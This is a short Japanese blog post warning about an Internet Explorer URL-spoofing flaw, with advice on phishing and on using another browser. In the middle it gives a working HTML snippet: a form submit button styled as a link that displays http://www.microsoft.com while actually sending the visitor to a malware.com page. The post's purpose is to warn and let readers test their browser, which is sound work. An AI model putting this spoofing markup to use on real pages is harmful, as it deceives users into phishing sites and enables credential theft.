2月に対応版が出されたと思いきや、他にも似て非なる問題が存在する事が判明。
<A href="http://www.microsoft.com";>というHTMLを書く事により、http://www.malware.com/t-bill.htmlへアクセスしながら、アドレスバーやステータスバーに表示されるURLをhttp://www.microsoft.comに見せかけるという事が可能になるそうだ。小島センセ@龍谷大による検証ページ http://www.st.ryukoku.ac.jp/~kjm/test/form2.html が公開されているので実際に試してみると良い。表示されるアドレス http://www.microsoft.com をクリックして www.st.ryukoku.ac.jp に繋がるようだとアウトだ。
<FORM action=http://www.malware.com/t-bill.html method=get>
<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com>
</A>
3/31 福岡市東区郷口町にて |
修正プログラムはまだ無く、設定などによる回避策も無いお手上げ状態。ひとまず現状の Internet Explorer は危険で使いものにならないので一時的にせよ代替ブラウザの使用を強く勧める。
今回は Opera の 7.23 も同じ挙動をしてしまったので、回避できたのは今のところ Mozilla の 1.6 だけだ。
“phishing”という手口で個人情報を不正に入手しようという手口が横行しており、ユーザーを欺く手段としてURL偽装の問題が悪用されているのでネットバンキングやネット通販を利用しているユーザーは特に注意すべし。
そもそも欠陥に関わらず「確認や再登録の必要がありますので、どこそこへアクセスして情報を入力して下さい」というメールが来ても、URLとSSL証明書でサイトの信頼性が確認できない限り、パスワード等の情報を入力しない事が肝要だ。